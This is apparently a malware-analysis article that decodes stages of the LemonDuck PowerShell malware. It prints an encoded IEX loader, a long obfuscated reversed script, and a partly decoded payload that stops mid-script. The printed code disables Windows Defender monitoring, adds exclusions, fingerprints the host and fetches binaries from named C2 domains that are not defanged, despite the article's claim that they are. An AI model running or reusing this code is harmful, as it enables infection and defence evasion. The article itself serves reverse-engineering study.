This is the second article in our analysis of the LemonDuck malware. [earlier] we analyzed the “mail.jsp” script, which downloaded and invoked another script named “a.jsp”.
You can find the resources related to the malware we analyze here in this GitHub repository.
⚠️ Any domains/URLs/IPs or scripts discovered while analyzing malware are malicious. I defanged these URLs to prevent accidental clicks. Don’t try to visit these domains or run these scripts on your host machine; always use a sandboxed VM to perform experiments.
Stage 0
The LemonDuck malware has various phases and stages, and for each of them it uses a different script: mail.jsp, 7p.php, report.jsp, a.jsp.
We already analysed the mail.jsp script.
We have the malicious script a.jsp with us 👇🏻, which we extracted in the last article.
IEX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('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'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
This is an encoded script: the long hex string is split into two-character pairs, each pair is converted to a byte, the bytes are run through a DeflateStream in Decompress mode, read back as ASCII and handed straight to IEX. Let’s decode it and see what it does.
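A static way to get at Stage 1 without letting IEX run anything, as an added example that is not part of the original article: the Python below pulls the hex blob out of the one-liner, turns it into bytes and inflates it with raw DEFLATE, which is the format IO.Compression.DeflateStream produces. The one-liner it decodes is a constructed benign sample built by build_stage0(), not the a.jsp text; the regular expression and the helper names are my own.

```python
import re
import zlib

# The blob lives in  $('<hex>'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)})
HEX_BLOB_RE = re.compile(r"\$\('([0-9A-Fa-f]+)'\s*-split\s*'\(\.\.\)'")


def extract_hex(one_liner):
    """Pull the hex string out of the Stage 0 wrapper without executing it."""
    m = HEX_BLOB_RE.search(one_liner)
    if m:
        return m.group(1)
    # Slightly different wrapper: fall back to the longest run of hex digits.
    runs = re.findall(r"[0-9A-Fa-f]{32,}", one_liner)
    if not runs:
        raise ValueError("no hex blob found in one-liner")
    return max(runs, key=len)


def decode_stage0(one_liner):
    """Return the script text that IEX would have executed."""
    blob = bytes.fromhex(extract_hex(one_liner))
    # IO.Compression.DeflateStream is raw DEFLATE (no zlib or gzip header),
    # i.e. wbits=-15; a plain zlib.decompress() fails with "incorrect header check".
    raw = zlib.decompress(blob, wbits=-15)
    # The sample reads the stream back with [Text.Encoding]::ASCII.
    return raw.decode("ascii", errors="replace")


def build_stage0(script):
    """Constructed sample: wrap a script the way the a.jsp one-liner does."""
    comp = zlib.compressobj(level=9, wbits=-15)
    blob = comp.compress(script.encode("ascii")) + comp.flush()
    return (
        "IEX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream "
        "($(New-Object IO.MemoryStream (,$('" + blob.hex()
        + "'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), "
        "[IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
    )


# Benign stand-in for the real payload (constructed here, not the article's sample).
SAMPLE_SCRIPT = "Write-Host 'stage 1 would start here'"
SAMPLE_ONE_LINER = build_stage0(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print(decode_stage0(SAMPLE_ONE_LINER))
```

The wbits=-15 detail is the one that trips people up: DeflateStream writes no header, so anything that expects zlib or gzip framing rejects the blob even though the data is fine.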
Stage 1
After decoding the script we get:
$K8n3d =[chAR[]] " ))63]Rahc[,'TwE' ECALper- 93]Rahc[,'ImZ' ECAlPeRC- )'
) )29]RaHc[,)96]RaHc[+35'+']RaHc[+311]R'+'aHc[( EcAlpEr- 43]RaHc['+',ImZAGJImZEcALPErc-69]RaHc[,)0'+'21]'+'RaHc[+8'+'4]RaHc[+001]RaHc[(EcALPEr'+'c-63]RaHc[,)96]RaHc['+'+05]RaHc[+07]RaHc[( EcAlpE'+'r- 93]RaHc[,ImZD2EImZEcAlpEr- 421]RaHc[,)011]RaHc['+'+001]RaHc[+78]RaHc[( EcAlpEr-)I'+'mZ
AGJpsj.troper/lru_erocE2FAGJ XEIS
3 sdnoceS- peelS-ImZ+ImZtratS
}
}{hcta'+'c }
}
}
)setyb_warE2F]][rahc[ni'+'oj-( XEImZ+'+'ImZI
{ ))yarrAetybE2F,1ahsE2F,setyb_warE'+'2'+'F(ataDyfirev.asrE2F(fi
redivorPec'+'ivreSotpyrC1A'+'HS.yhpargotpyrC.ytirImZ+ImZuceS.meImZ+ImZ'+'t'+'syS tcejbO-weN = 1ahsE2F
)46esabE2'+'F(gn'+'irtS46esaBmorF::]trevnoc[ = yarrAetybE2F
)setyb_ngisImZ+ImZE2F]][r'+'ahc[(nioj- = 46eImZ+ImZsabE2ImZ+I'+'mZF
'+'
)smaraPasrE'+'2F(sretemaraImZ+ImZPtropmI.asrE2F
;redivorPecivre'+'SotpyrCASR.yhpargotpyrC.ytiruceS.metsyS emaNepImZ+ImZyT- tcejbO-weN = aImZ+ImZsrE2F
10x0,00x0,10x0 = tneImZ+ImZnopxE.'+'smaraPasImZ+ImZrE2F
d5x0,b6x0,74x0,7bx0,83x0,aeImZ+ImZx0,79x0,eax0,b7x0,4ax0,36x0,88x0,7fx0,5dx0,36x0,dfx0,27'+'x0,01x0,59x0,e2x0,ImZ+ImZ6fx0,f3x0,79x0,bdx0,89x0,'+'a0x0,bcx0,03x0,e6x0,93x0,fcx0,0dx0,24x0,e8x'+'0,59x0,ea'+'x0,a6x0,19x0,7ax0,04x0,97x0,dcx'+'0,21x0,2ex0,f9x0,7ax0,a8x0,87x0,43ImZ+ImZx0,7cx0,7ex'+'0,dcx0,10x0,25x0,6cx0,37x0,03'+'x0,91'+'x0,1dImZ+ImZx0,b2x0,d7x0,b9x0,e2x0,8bx0,c6x0,'+'eex0,29x0,2fx0,53x0,fbx0,88x0,c'+'dx0,06x0,1dx0,11x0,6fx0,f4x0,6ax0,dbx0,edx0,acx0,e6x0,69x0,'+'70x0,68x0,07x0,26x0,b3x0,f4x'+'0,3fx0,b6x0,73x0'+',dcx0'+',dcx0,0cx0,d3x0,25x0,c3x0,32x0,e4x0,eax0,6dx0,76x0,bex0'+',55x0,b7x0,c6x0,e6x0,37x0,a9x0,35x0,37x0,ffx0,f2'+'x0,ffx'+'0ImZ+Im'+'Z,28x0,d9x0,99x0,e5x0,14x0,d6x0,cbx0,79x0,bbx0,7ImZ+ImZdx0,8ax0,56x0,adx0'+' = suludoM.smaraP'+'as'+'rE2F
sretemaraPASR.yImZ+I'+'mZhpargo'+'tpyr'+'C.ytiruceS.metsyS tcejbO-weN '+'= '+'smaraPasrEImZ+'+'ImZ2F '+'
;]tnuoc.setyb_serE2F..371['+'setyb_serE2F = sImZ+ImZetyb_warE2FI'+'mZ+ImZ
;]171..0[setyb_ImZ+ImZserE2F = setyb_ngisE2F
{)371 tg- tnuoc.setyb_serE2F(fi
)lrulanifE2FImZ+ImZ(ataDdaolnwoD.tneilcbewE2F = setyb_serE2F
}{hctac }
))D'+'2E-D2E,D2EE5qImZ+ImZD2E(ecalpImZ+ImZer.kcuD_nomeLE2F+AGJ-kcuD-nomeLAGJ,AGJtnegA-resUAGJ(dda.sredaeH.ImZ+ImZtneilcbewE2F
{yrt ImZ+ImZ
AGJs'+'marapE2FAGJ+AGJ?AGJ+AGJlruE2FAGJ '+'= lrulanifE2F
tneilx0dCbeW.teN tcex0djbO-wx0deN = tneilcbewE2F
{yrt
)
lruE2F]gnirts[
(maraP
{ XEIS noitcnuf
)AGJ&AGJnioj-)AGJ9.0AGJ,trop'+'piE2F,emImZ+ImZanptE2F,pimlE2F,f_fno'+'cE'+'2F]tnI[,eIm'+'Z+ImZmitpuE2F,ImZ+ImZrhmE2F,pimE2F,vmEImZ+ImZ2F,)AGJAGJnioj-]5ImZ+ImZ..0[5ImZ+ImZdmr'+'klE2F(,)AGJAGJnioj-]5..0ImZ+ImZ[5dmmlE2F(,)AGJAGJniImZ+ImZoj-'+']5..0[ImZ+ImZ5dmfilE2FImZ+ImZ(,t'+'imrepE2F]ImZ+ImZtImZ+ImZnI[,rep_'+'upcE2F,memE2F,ImZ+'+'ImZdra'+'cE2F,emanupcE2F,evirdImZ+ImZE2F,niamodE2F,resuImZ+ImZE2F,46siE2F]tnI[,soE2ImZ+ImZF(@(+AGJ&'+'AG'+'J=+smaImZ+ImZrapE2F
}{hctac}))D2E'+'9.9.'+'9.9'+'D'+'2EImZ+ImZ,D2E8.8.8.8ImZ+ImZD2E(@('+'redrOhcraeSrevreSSNDteS.)eurt=delbanepi retlif- noitarugifnocretpadakrowten_23niw ssalc- tcejboimw-teg({yrt
}
}
'+'kaerb
]2[enilE2F = troppiE2F
{))diptE'+'2F qe- ]1-[enilE2F( dna- )AGJDEHSILBATSEAGJ(sniatnoc.tE2F(fi '+'
} eunitnoc {'+' )llunE2ImZ+ImZF qe- ImZ+Im'+'ZenilE2F( '+'fi
}_'+'E2F{ ? ndW)D2E D2E(tilpImZ+ImZs'+'.tE2F = e'+'nilE2F
{)nnocpctE2F ni tE2F(hcaerof
AGJAGJ=troppiE2F
PCT '+'pona- tatSteN = nnocpctE2F
)}e'+'manssecorp._E2ImZ+ImZF,di._E2F{hcaImZ+ImZerofndW1 '+'tsrif- ImZ+ImZtcejbo-tcelesndWg'+'ImZ+ImZnidnec'+'seD- upc trosndWssecorpImZ+ImZ-tIm'+'Z+ImZ'+'eg(=em'+'anptE2F,diptE2F
} gnirtSoTsserddAPI._E2F ohce{ hcaerof ndW )AGJmoc.qk'+'96b.pAGJ(sesserddAts'+'oHteG::]snD.teN.'+'metsyS[=pimlE'+'2F
nosj'+'.'+'1XXXgImZ+ImZifnocE5q0.1vE5qlleImZ+ImZhSrewoPswodniWE5q23metsysE5qswodniwE5q:c ht'+'ap-tset=f_fnoc'+'E2F
)D2E- D2E+emaImZ+ImZnerE2F+D2En'+'dW}{hctac}}{)1(elihw;)(trats.sE2F'+';92556]renetsiLpcT.'+'stekcoS.'+'tImZ+Im'+'ZeN.metsyS[=s'+'E2F{yrt ohceD2EImZ+ImZ( pts
}
))emanerE2FImZ+ImZ bpg(+)nibrkE2F 5dmrkE2F 4edocE2F fcg(( pts
{)r'+'Klaco'+'lE2F('+'fi
4edocE2F x'+'Ex0dI
AGJrKAGJ eImZ+ImZ'+'docg=4edocE2F
}
}
))eman'+'erE2F ImZ+ImZnib'+'gmE2F apg(+)nibgmE2F 5dmgmE2F 3edocE2F fcg(( pts
{)gnMTlacolE2F(fi
3edocE2'+'F xEx0dI
AImZ+ImZGJgnMTAGJ edocg=3edocE2F
'+'
{)46siE2F dna- )asiE2F ro- nsiE2F((fi'+'
}
}'+'
))emaner'+'E2F '+'nibmE2F a'+'p'+'g(+)nibmE2F 5dImZ+ImZm'+'mE2F 2edocE2F fcg(( pts
{)nMTlacolE'+'2F(ImZ+I'+'mZfi
2edocE2F xEx0dI
AGJnMTAGJ edocg=2edoImZ+ImZ'+'cImZ+ImZE2F
{)46siE2F(f'+'i
}
))emanerE2F bpg(+)nibfiE2F 5ImZ+ImZdmfiE2F 1edocE2F fcg(( pImZ+ImZts
{)fIlacolE2F(fi
1edocE2F xEx0dI
AGJfIAGJ edocg='+'1edocImZ+ImZ'+'E2F
}
D2E}{hctac})D2E'+'+lfE2F+D2ElacolE2F]fer[,D2ED2ED2E+lfE2F+D2E'+'lacoLeE5qlabolGD2ED2E,eurtE2F(xetuM.gnidaerhT tcejbO-we'+'N;esa'+'lfE2F=D2E+lfE2F+D2ElacolE2F{yrtD2E
{'+' )lfE2F(edocg noitcnuf
}
D2E- D2E+'+'emanE2F+D2End'+'W)nocE2F]][rahc[nioj-(XEx'+'0dID2E '+'
{)ImZ+Im'+'ZemanE2F(bpg noitImZ+ImZcnuf'+'
}
AGJexe.manfE2FE5q%pmt% & exe.manfE2FE5q%pmt% iro.manfE2FE5q%ImZ+ImZpmt% y/ ypoc c/ dmc& - emanE2ImZ+ImZFndWAGJ+)D2E&^^^D2E,'+'D2EImZ+ImZ&D2E(ecalp'+'er.'+')'+'D2EndW^^^D2E,D2EndWD2E(ecalper.)'+'D2EnibE2F setyBEP- '+'1tset;))001 tnuoC- modnaR-teGndW)721..1'+'((+_nibE2F,pemE2F(se'+'tyBllAeti'+'rW::]eliF.OI.metsyS[;D2ED2ED2E+AGJiro.manfE2FE5qImZ+ImZAGJ+D2ED2ED2EImZ+ImZ+pmt:v'+'neE2F=pemE2F;)(enolC.nibE2F=_nibE2F;ImZ+ImZ)00000001(setyBdaeR.)))sserpmoceD::]edoMnoisserpmoC.noisse'+'rpmoC.OI[(ImZ+I'+'mZ ,))])tnuoc.nocE2F(..)1+iE2F([nocE2F,(maert'+'SyromeM.OI.metsyS tc'+'ejImZ+ImZbO-weN( maertSpizG.'+'noisserpmImZ+ImZoC.OI.metsyS tcejbO-weN(redaeRyrani'+'B.OI tcejbO-ImZ+ImZweN(=nibE2F;)]iE2F..0[no'+'cE2F'+']][rahc[nioj-(xex0di;}}kImZ+ImZaerb{)a'+'0x0'+' qe- ]iE2F[noc'+'E2F(fi{)1=+iE2F;1-I'+'mZ+ImZtnu'+'oc.nocE2F tl- iE2F;0=ImZ'+'+ImZiE2F(rofD2E(
{)emanE2'+'F,manfE2F(apg noitcnuf
}
)'+'ImZ+ImZD2E&^^^D2E,D2E&D2E(e'+'calper.)D2EndW^^^D2E,D2End'+'WD2E(ecalper.)D2E}_5dmE2F=5dmfiE2F;_n'+'ocE2F=nocE2F{)puonE2FIm'+'Z+'+'ImZ(fi}ImZ+ImZ}1=puonE2F{esImZ+'+'ImZle})nocE2F,pfiE2F(setyBllImZ+ImZAetirW::]e'+'liF.OI.'+'metsyS[{)5dmfiE2Fqe-'+'tE2F(fi;nocE2F 5dmg=tE2F;)D2ED2ED2E+'+'sm'+'arapE2F+D2E?D2E+nfE2F+D2E/D2EImZ+Im'+'ZD2E+lr'+'u_nwodE2FImZ+ImZ(ataddaolnwod.)tneilx0dCbeW.ImZ+I'+'mZteN tcex0djbO-wx0deN(=nocE2F{)puonE2F!(fi}}1='+'puonE2F{)5dmfiE2Fqe-_5dmE2F(fi;_nocE2F 5dmg=_5'+'dmE2F;'+')pfiE2F(setyBllAdaeR::]eliF.OI.metsyS[=_nocE2F{)pfiE2F htap-tset(fi}sEImZ+ImZ2F nrute'+'r;})D2ED2E2xD2ED2E(gnirtSoT._E2F=+sE2F{hcaerofndW)nocImZ+ImZE2F(hsaHe'+'tupmo'+'C.)(etaerC::]5DM.yhpargotpyrC.ytiruceS.metsyS[{)nocE2F(5dmg noitcnuf;ImZ+ImZD2ED'+'2ED2E+lru_nImZ'+'+ImZwodE2F+D2ImZ+ImZED2ED2EImZ+ImZ=lru_nwodE2F;D2ED2ED2E+nfE2F+D2EE5qD2ED2ImZ+ImZE+pmt:vneE'+'2F=pfiE2F;D2ED2ED2E+dmE2F+D2ED2ED2E=5dmfiE2F;D'+'2E+edocE2F+D2E ohceD2'+'E'+'(
{)nfE2F,dmE2F,edocEI'+'mZ+ImZ2F(fcg noitcnuf
}
AGJargE2F c/AGJ ts'+'iLtnemugrA- exe.dmc htaP'+'eliF- ssecorP-tratS
argE2ImZ+ImZF'+' tsoh-etirw
{)arg'+'E2F(ptImZ+ImZs noiImZ+ImZtcnuf
pmt:vneE2F noitImZ'+'+ImZacol-tes
AGJ&AGJnioj-)camE2F,dImZ+'+'ImZiugE2F,eman_pmocE2F,vE2F(@='+'smarapE2F
]1[)AGJ?AGJ(tilps.lruE2F=vE2F
}1=asiE2F{))AGJDMAndWnoedaRAGJ hctam- dracE2F((fi
}1=nsiE2F{))AGJECROFEGndWAIDIVNndWXTGAGJImZ+ImZ hctam- '+'d'+'racE2F((f'+'i
ImZ+ImZ
}{hctac'+'}ImZ+ImZ
emanImZ+ImZerE2FE5q0.1vE5qllehSrImZ+ImZewoPswodniWEImZ+ImZ5q23metsysE5qswodni'+'wE5q:c ssecorPnoisulcxE- ecnereferPpImZ+ImZM-ddA
ImZ+ImZexe.llehsrewoImZ+ImZpE5q0.1vE5qImZ+ImZllehSrewoPswodniWE5q23metsysE5qswodniwE5q:c ssecorPnoImZ+ImZisulcxE- ecnereferPpM-ddA
E5q:c htaPnoisulcxE- ecneref'+'erPpM-ddA
1 gnirotinoMemitlaeImZ+ImZRelbasiD- ecnerImZ+ImZeferPpM-teS
{yrt
}{hctac})'+'D2E,D2E(nioj-latoImZ+ImZt.etarhsah.jboE2F=rhmE2FIm'+'Z+Im'+'Z
ImZ+ImZ
pi.n'+'oi'+'tcennoc.jboE2F=pimE2F
no'+'isrev.jboE2F=vmE2F
))D2'+'Eyrammus/1/96634:1.0.0.721//:ptt'+'hD2E(AGJImZ+ImZgnirtsdao'+'lnwodAGJ.)tneilx0dcbew.ten tcex0djbo-ImZ+ImZwx0den((tcejbOezilaireseD.)rezilaireStpircSavaJ.noitazilaireS.tpircS.beW tcejbO-weN( = jboE2F
)AGJsIm'+'Z+ImZno'+'isnetxE.beW.metsySAGJ(emaNlaitImZ+ImZraPhtiWdaoL::]ylbm'+'essA.noitcelfeR['+'
{yrt
}{h'+'ctac}AGJn'+'dWAGJnioj-)}]0[))(gnirtso'+'t.epyTeviImZ+ImZrD._E2F(ImZ+ImZ+AGJ_AGJ+]0[)emaN._E2F({hcaerof ndW }))AGJ23TAFAGJ qe'+'- tamroFevirD._E2F( ro- )AGJSFTNAGJ'+' qe- tamroFevirD._E'+'2F(( dna- ))AGJkrowteN'+'AGJ qe'+'- epyTevirD._E2F( '+'ro- )AGJelbavomeRAGJ qeImZ+I'+'mZ- epyTevirD._E2'+'F(( dna'+'- )4201 tg- ecapSeerFelbaliavA._E2'+'F( dna- ydaeRsI._E2F{ erehw ndWImZ+ImZ )ImZ+ImZ(sevirDteG::'+']ofnIevirD.OI.metsys[( = evi'+'rdE2F
{yrt
bG1/musImZ+ImZmE2F=memE2F;} yticapaC._E2F =+ musmE2F { }0 = musmE2F{\% ndW yromeMImZ+ImZlacisyhP'+'_23niW imwg
AGJ)egatnecre'+'PdaoL.)rossecoImZ+ImZrP_23niW ssalCImZ+ImZ- ImZ+ImZtcejbOimW-teG((E2FAGJ = rep_'+'u'+'pcE2F
eman.)rellortnoCoediV_23'+'niW tcejbOimW-teG( = dracE2F
eman.)ro'+'ssecorp_23niwImZ+ImZ tcejboimw-teg( = emanup'+'cE2F
}sdnoceslatot._'+'E2F{hcaerofndW)tnuoCkciT::]tnemnorivne[(sd'+'nocesilliMmo'+'rF::]napsemit[ = emitpuE2F
nia'+'moD.)'+'meImZ+ImZtsysreImZ+Im'+'Ztupmoc_23niw'+' '+'tImZ+ImZcejbOimW-teG( = niamodE2FImZ'+'+ImZ
EMANRESU:'+'vneE2F = resuE2F
noisreV.bsoE2F+AGJ_AGJ+)AGImZ+ImZJAGJ,'+'AGJ swodni'+'W '+'tfosorciMA'+'GImZ+ImZJ(ecalper.noitp'+'aC.bso'+'E2F = soE2F
)metsySgnitarepO_'+'23niW ssalc- t'+'cejbOiImZ+ImZm'+'W-teG( = bsoE2'+'ImZ+ImZF
1 tImZ+ImZsrif- tcejbo-tceles ndW sserddacaM.)}eurtE2F QE- delbanepi._E2F{ erehw ndW noImZ+ImZitaImZ+ImZrugifnoCretpa'+'dAkrowteN_23niW tcejbOim'+'W-teG( = camE2F
DI'+'UU.)tcudorPmImZ+ImZetsySretupmoC_23n'+'iW tcejboimw-t'+'eg( = diugE2F
EMANRETUPMOC:vneE2'+'F = eman_pmocE2F
)AGJrotartsinimdAA'+'GJ ]ImZ+ImZeloRnItliuBswodniImZ+ImZW.lapicnirP.ytir'+'uceS[(eloRnIsI.'+'))(tnerImZ+ImZruCteG::]ytitnedIswodniW.lapicnir'+'ImZ+ImZP.ytiruceS[]'+'lapicnirPswodniW.lapicnirP.ytiruceS'+'[( = timrepE2F
AGJ/A'+'GJnioj-]'+'2..0[)AGJ/A'+'GJ(tilps.lruE'+'2F = lru_erocE2F
}AGJmoc.9u3'+'bb.t//:ptthAGJ=lruE2F{)lr'+'uE2F!(fi
AGJmocImZ+ImZ.uImZ+ImZdjw87u.d//:ptthAGJ = lru_nwodE2F
'+'
'+'
}{hctac}))AGJnibrkE2FE5qpmImZ+ImZt:vImZ+ImZnImZ+ImZeE2FAGJ(seImZ+ImZtyBl'+'ImZ+ImZlAdaeR::]eliF.OI[( ImZ+ImZ5dmg=5dmrklE2F{yrt
}{hctac}))AGJnibmE2'+'FE5qpmt:vneE2FAGJ(s'+'etyBllAdaeR::'+']eliF.OI[( 5dmg=5dmmlE2ImZ+ImZF'+'{yrt
}{hctac}))AGJnibfiE2FE5qpmt:vneE2FAGJ(setyBllAdaeR::]eliF.OI[( 5dmg=5dmfilE2F{yrt
AGJAGJ,AGJAGJ,AGJAGJ'+'=5dmrklEImZ+ImZ2F,5dmmlE2F,5dmfilE2F
emanrteg=emanerE2F
}
e'+'maneE2F ImZ+ImZnruter
}AGJexe.llehsrewImZ+ImZopAImZ+ImZGJ=emaneE2F{))AGJemaneE2FE5qhtaprE2FAGJImZ+ImZ hta'+'p-tset(!(fi
llun-tuondWA'+'GJemaneE2FE5qhtaprE2FA'+'GJ AGJe'+'xe.llI'+'mZ+ImZehsrewopE5qhtaprImZ+ImZ'+'E2FAGJ meti-y'+'poc
AGJexe.AGJ + '+'))'+'6%)modnaR-teG(+6( tnu'+'oC- modnaR-ImZ+ImZteGndW)2ImZ+ImZ21..79+09..56+75..84(]][rahc[(n'+'ioj-=emaneE2F
}
}
ImZ+ImZemaneImZ+ImZE2F nruter ImZ+I'+'mZ
{)_'+'5dmE2'+'F '+'qe- 5dmtE2F(fi
))AGJemaneE2FE5'+'qhtaprE2'+'FA'+'GJ(setyBllAdaeR::]eliF.OI[( 5dImZ+ImZmg=_5dmE2F ImZ+ImZ
{)semaneE2F ni emaneE2F(hcaerof ImZ+ImZ
))AGJexe.lle'+'hsrewopE5qh'+'taprE2FAGJ(setyBllA'+'daeR::]eliF.OI[( 5dmg = 5ImZ+I'+'mZdmtE2F
}eman._E2F{hcaerofndWexe.llehsrewop edulcxE- exe.'+'* edulcnI- A'+'GJ*E5qhtaprE2FAGJ icg = semaneE2F
AGJ0.1VE5qllehsrewopswodniWE5q23metsyImZ+ImZSE5qswodniWE5q:CAGJ=h'+'taprE2F
{)(emanrteg noitcnuf
}
lE2F nruter ImZ+ImZ
})D2E2xD2E(gnirtSoT._E2F=+lE2F{hcaerofndW)dE2F(hsaHetupmoC.)(etaerC::]5D'+'M.ImZ+ImZyhpargotpyrC.ytiruceS[ '+'
{)dE2F(5dmg noitcnuf
}
'+'AGJ31869c5772bc25ea69e32292a97d0c62AGJ=5dmgmE2F
AGJnib.g6mAGJ=nibgmE'+'2F
AGJ3d9aa5ImZ+ImZ5c53e66d'+'dfae7021e100a09323AGJ=5dmmE2'+'F'+'
AGJnib.6mA'+'GJ=nibmE2F
{)46sImZ+ImZiE2F(fi
AGJ6aaa5cad88365817f16316647dfc1a7bA'+'GJ=5dmrkE2F
AGJnib.rkAGJ=nibrkE2F
AG'+'Jf6eff1a9dd5e47ImZ+ImZ0f343207213dImZ+ImZdf9f40AGJ=5dmfiE2F
AGJnib.fiAGJ=nibfiE2F
)8 qe- ez'+'iS:ImZ+I'+'mZ:]rtPtnI[(]tni[=46siE2FImZ(( ( )'+'ImZI'+'mZNi'+'Oj-I'+'mZxImZ+]3,1[)eCnEREfERPesOBR'+'EvTwE]GnirTS[( (. '(( ( )'x'+]31[DILlehS$+]1[diLlEHs$ (&" ; [ARRay]::Reverse( $k8n3D) ; ( " $( sV 'ofS' '') " + [sTRing]( $k8n3D) +" $(set-variAbLe 'Ofs' ' ' )")
This is still obfuscated code: the whole script is stored backwards in a [char[]] array, flipped at run time with [Array]::Reverse, joined into a string and executed.
So let’s try to deobfuscate the script.
Stage 2
The payload we obtained is:
( ((' .( ([STrinG]EwTvE'+'RBOsePREfEREnCe)[1,3]+ZmIxZm'+'I-jO'+'iNZm'+'IZmI'+') ( ((ZmIF2Eis64=[int]([IntPtr]:Zm'+'I+ZmI:Si'+'ze -eq 8)
F2Eifbin=JGAif.binJGA
F2Eifmd5=JGA04f9fdZmI+ZmId312702343f0ZmI+ZmI74e5dd9a1ffe6fJ'+'GA
F2Ekrbin=JGAkr.binJGA
F2Ekrmd5=JG'+'Ab7a1cfd74661361f71856388dac5aaa6JGA
if(F2EiZmI+ZmIs64){
F2Embin=JG'+'Am6.binJGA
'+'F'+'2Emmd5=JGA32390a001e1207eafd'+'d66e35c5ZmI+ZmI5aa9d3JGA
F2'+'Emgbin=JGAm6g.binJGA
F2Emgmd5=JGA26c0d79a29223e96ae52cb2775c96813JGA'+'
}
function gmd5(F2Ed){
'+'[Security.CryptographyZmI+ZmI.M'+'D5]::Create().ComputeHash(F2Ed)Wdnforeach{F2El+=F2E_.ToString(E2Dx2E2D)}
ZmI+ZmIreturn F2El
}
function getrname(){
F2Erpat'+'h=JGAC:q5EWindowsq5ESZmI+ZmIystem32q5EWindowspowershellq5EV1.0JGA
F2Eenames = gci JGAF2Erpathq5E*JG'+'A -Include *'+'.exe -Exclude powershell.exeWdnforeach{F2E_.name}
F2EtmdZm'+'I+ZmI5 = gmd5 ([IO.File]::Read'+'AllBytes(JGAF2Erpat'+'hq5Epowersh'+'ell.exeJGA))
ZmI+ZmI foreach(F2Eename in F2Eenames){
ZmI+ZmI F2Emd5_=gmZmI+ZmId5 ([IO.File]::ReadAllBytes(JG'+'AF'+'2Erpathq'+'5EF2EenameJGA))
if(F2Etmd5 -eq'+' F'+'2Emd5'+'_){
Zm'+'I+ZmI return F2EZmI+ZmIenameZmI+ZmI
}
}
F2Eename=-joi'+'n([char[]](48..57+65..90+97..12ZmI+ZmI2)WdnGetZmI+ZmI-Random -Co'+'unt (6+(Get-Random)%6'+'))'+' + JGA.exeJGA
cop'+'y-item JGAF2E'+'ZmI+ZmIrpathq5EpowersheZmI+Zm'+'Ill.ex'+'eJGA JG'+'AF2Erpathq5EF2EenameJG'+'AWdnout-null
if(!(test-p'+'ath ZmI+ZmIJGAF2Erpathq5EF2EenameJGA)){F2Eename=JGZmI+ZmIApoZmI+ZmIwershell.exeJGA}
returnZmI+ZmI F2Eenam'+'e
}
F2Erename=getrname
F2Elifmd5,F2Elmmd5,F2ZmI+ZmIElkrmd5='+'JGAJGA,JGAJGA,JGAJGA
try{F2Elifmd5=gmd5 ([IO.File]::ReadAllBytes(JGAF2Eenv:tmpq5EF2EifbinJGA))}catch{}
try{'+'FZmI+ZmI2Elmmd5=gmd5 ([IO.File]'+'::ReadAllByte'+'s(JGAF2Eenv:tmpq5EF'+'2EmbinJGA))}catch{}
try{F2Elkrmd5=gmd5ZmI+ZmI ([IO.File]::ReadAlZmI+ZmI'+'lBytZmI+ZmIes(JGAF2EeZmI+ZmInZmI+ZmIv:tZmI+ZmImpq5EF2EkrbinJGA))}catch{}
'+'
'+'
F2Edown_url = JGAhttp://d.u78wjdZmI+ZmIu.ZmI+ZmIcomJGA
if(!F2Eu'+'rl){F2Eurl=JGAhttp://t.bb'+'3u9.comJGA}
F2Ecore_url = F2'+'Eurl.split(JG'+'A/JGA)[0..2'+']-joinJG'+'A/JGA
F2Epermit = (['+'Security.Principal.WindowsPrincipal'+'][Security.PZmI+ZmI'+'rincipal.WindowsIdentity]::GetCurZmI+ZmIrent())'+'.IsInRole([Secu'+'rity.Principal.WZmI+ZmIindowsBuiltInRoleZmI+ZmI] JG'+'AAdministratorJGA)
F2Ecomp_name = F'+'2Eenv:COMPUTERNAME
F2Eguid = (ge'+'t-wmiobject Wi'+'n32_ComputerSysteZmI+ZmImProduct).UU'+'ID
F2Emac = (Get-W'+'miObject Win32_NetworkAd'+'apterConfigurZmI+ZmIatiZmI+ZmIon Wdn where {F2E_.ipenabled -EQ F2Etrue}).Macaddress Wdn select-object -firsZmI+ZmIt 1
FZmI+ZmI'+'2Eosb = (Get-W'+'mZmI+ZmIiObjec'+'t -class Win32'+'_OperatingSystem)
F2Eos = F2E'+'osb.Ca'+'ption.replace(JZmI+ZmIG'+'AMicrosoft'+' W'+'indows JGA'+',JGAJZmI+ZmIGA)+JGA_JGA+F2Eosb.Version
F2Euser = F2Eenv'+':USERNAME
ZmI+'+'ZmIF2Edomain = (Get-WmiObjecZmI+ZmIt'+' '+'win32_computZ'+'mI+ZmIersystZmI+ZmIem'+').Dom'+'ain
F2Euptime = [timespan]::Fr'+'omMillisecon'+'ds([environment]::TickCount)Wdnforeach{F2E'+'_.totalseconds}
F2Ec'+'puname = (get-wmiobject ZmI+ZmIwin32_process'+'or).name
F2Ecard = (Get-WmiObject Win'+'32_VideoController).name
F2Ecp'+'u'+'_per = JGAF2E((Get-WmiObjectZmI+ZmI -ZmI+ZmIClass Win32_PrZmI+ZmIocessor).LoadP'+'ercentage)JGA
gwmi Win32_'+'PhysicalZmI+ZmIMemory Wdn %{F2Emsum = 0} { F2Emsum += F2E_.Capacity };F2Emem=F2EmZmI+ZmIsum/1Gb
try{
F2Edr'+'ive = ([system.IO.DriveInfo]'+'::GetDrives(ZmI+ZmI) ZmI+ZmIWdn where {F2E_.IsReady -and (F'+'2E_.AvailableFreeSpace -gt 1024) -'+'and ((F'+'2E_.DriveType -Zm'+'I+ZmIeq JGARemovableJGA) -or'+' (F2E_.DriveType -'+'eq JGA'+'NetworkJGA)) -and ((F2'+'E_.DriveFormat -eq '+'JGANTFSJGA) -or (F2E_.DriveFormat -'+'eq JGAFAT32JGA))} Wdn foreach{(F2E_.Name)[0]+JGA_JGA+ZmI+ZmI(F2E_.DrZmI+ZmIiveType.t'+'ostring())[0]})-joinJGAWd'+'nJGA}catc'+'h{}
try{
'+'[Reflection.Asse'+'mbly]::LoadWithParZmI+ZmItialName(JGASystem.Web.Extensi'+'onZmI+Z'+'mIsJGA)
